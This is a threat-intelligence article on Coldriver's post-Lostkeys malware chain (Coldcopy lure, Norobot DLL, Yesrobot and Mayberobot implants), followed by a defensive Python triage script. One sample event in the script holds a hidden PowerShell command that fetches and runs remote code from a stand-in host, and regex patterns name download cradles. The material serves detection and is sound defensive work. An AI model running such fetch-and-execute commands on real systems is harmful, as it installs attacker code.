A Russia-linked threat actor tracked as Coldriver (UNC4057, Star Blizzard, and Callisto) has been increasingly using a new malware family after its Lostkeys malware was exposed in May 2025.
According to a new analysis from Google’s Threat Intelligence Group (GTIG), the group moved quickly to refine and retool its arsenal just five days after public disclosure, shifting to a related delivery chain that Google has codenamed Norobot, Yesrobot and Mayberobot.
The attack begins with an HTML ClickFix-style lure dubbed Coldcopy that drops a DLL named Norobot and executes it via rundll32.exe. Early versions briefly deployed a Python backdoor called Yesrobot, which uses HTTPS to fetch commands and can download files and harvest documents. Only two Yesrobot infections were observed over a two-week span in late May, GTIG said.
Researchers believe that Yesrobot was likely a quick “stopgap mechanism” after Lostkeys became public, before the threat actors implemented a more capable PowerShell implant called Mayberobot. The PowerShell-based family can download and run payloads from URLs, execute commands through cmd.exe and run arbitrary PowerShell code. Zscaler ThreatLabz released a report last month describing Coldriver’s tactics and the Norobot and Mayberobot implants, which it tracks as ‘Baitswitch’ and ‘Simplefix,’ respectively.
Google says that an early Norobot variant installed a full Python 3.8 runtime on compromised hosts, a noisy artifact the actors later removed as they refined the chain. GTIG also noted the group has alternated between simplifying the delivery to increase success rates and more complex methods such as splitting cryptographic keys to evade detection.
Unlike Coldriver’s previous credential-theft campaigns against high-profile NGOs, policy advisors and dissidents, the latest waves use ClickFix-style prompts and a fake CAPTCHA that tricks targets into running malicious PowerShell through the Windows Run dialog. Google said Norobot and Mayberobot are likely used against high-value targets who may already have been phished, for deeper intelligence collection from compromised devices.
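The chain described above leaves a few host-level artifacts a defender can hunt for: rundll32.exe loading a DLL from a user-writable directory (the Norobot drop), PowerShell launched from the Run dialog (so its parent is explorer.exe) with a download cradle (the ClickFix step and the Mayberobot stager), and a Python interpreter spawned from an unusual parent (the early variant that shipped a full Python 3.8 runtime). The following triage script is an added example and is not code from GTIG, Zscaler or the Coldriver toolset; it assumes simplified process-creation records (Sysmon Event ID 1 style fields), the sample events are constructed for illustration, and the rundll32-to-python parent relationship is an assumption rather than something the reports state.

```python
"""Process-creation triage for the artifacts described in the article.
Added example, not from the GTIG or Zscaler reports. The event schema and
the sample events below are constructed for illustration."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    cmdline: str        # full command line of the new process


# Per-user locations a phishing lure can write to without elevation.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\", re.I)
# Remote-payload cradles: the PowerShell implant downloads and runs payloads from URLs.
DOWNLOAD_CRADLE = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|start-bitstransfer|https?://)", re.I)
ENCODED = re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_rundll32(ev: ProcEvent) -> str | None:
    """rundll32.exe executing a DLL that lives in a user-writable path (Norobot drop)."""
    if _base(ev.image) != "rundll32.exe":
        return None
    m = re.search(r'"([^"]+\.dll)"|(\S+\.dll)', ev.cmdline, re.I)
    dll = (m.group(1) or m.group(2)) if m else ""
    if dll and USER_WRITABLE.search(dll):
        return f"rundll32 loading DLL from user-writable path: {dll}"
    return None


def check_powershell(ev: ProcEvent) -> str | None:
    """PowerShell started from the Run dialog (parent explorer.exe) with a download cradle
    or an encoded command: the ClickFix / fake-CAPTCHA step."""
    if _base(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return None
    if _base(ev.parent_image) != "explorer.exe":
        return None
    if DOWNLOAD_CRADLE.search(ev.cmdline) or ENCODED.search(ev.cmdline):
        return f"PowerShell from Run dialog with remote/encoded payload: {ev.cmdline}"
    return None


def check_python(ev: ProcEvent) -> str | None:
    """Python interpreter spawned by rundll32 or PowerShell. The article says an early
    Norobot variant installed a Python 3.8 runtime; the parent relationship used here
    is an assumption for the example, not a detail from the reports."""
    if _base(ev.image) not in ("python.exe", "pythonw.exe"):
        return None
    if _base(ev.parent_image) in ("rundll32.exe", "powershell.exe", "pwsh.exe"):
        return f"Python interpreter spawned by {_base(ev.parent_image)}: {ev.image}"
    return None


CHECKS = (check_rundll32, check_powershell, check_python)


def triage(events: list[ProcEvent]) -> list[tuple[str, str]]:
    """Return (host, finding) pairs, in event order, for every heuristic that fires."""
    findings: list[tuple[str, str]] = []
    for ev in events:
        for check in CHECKS:
            hit = check(ev)
            if hit:
                findings.append((ev.host, hit))
    return findings


# Constructed sample events: three that match the described chain, three benign look-alikes.
SAMPLE_EVENTS = [
    ProcEvent("ws01", r"C:\Windows\System32\rundll32.exe", r"C:\Windows\explorer.exe",
              r"rundll32.exe C:\Users\alice\AppData\Local\Temp\loader.dll,Start"),
    ProcEvent("ws01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
              r'powershell -w hidden -c "iwr https://example.invalid/p -UseBasicParsing | iex"'),
    ProcEvent("ws02", r"C:\Users\bob\AppData\Local\Programs\Python\Python38\python.exe",
              r"C:\Windows\System32\rundll32.exe", r"python.exe -c import_stage"),
    ProcEvent("ws03", r"C:\Windows\System32\rundll32.exe", r"C:\Windows\explorer.exe",
              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
    ProcEvent("ws03", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\svchost.exe", r"powershell -File C:\Scripts\inventory.ps1"),
    ProcEvent("ws03", r"C:\Users\bob\AppData\Local\Programs\Python\Python38\python.exe",
              r"C:\Windows\System32\cmd.exe", r"python.exe script.py"),
]

if __name__ == "__main__":
    for host, finding in triage(SAMPLE_EVENTS):
        print(host, finding)
```

Each heuristic is deliberately narrow (a benign per-user Python install, a System32 DLL under rundll32, or a scheduled-task PowerShell run does not fire) so the output is a short list worth a human look rather than a flood; on real telemetry the three signals should be correlated per host, since the article's chain produces them in sequence on the same machine.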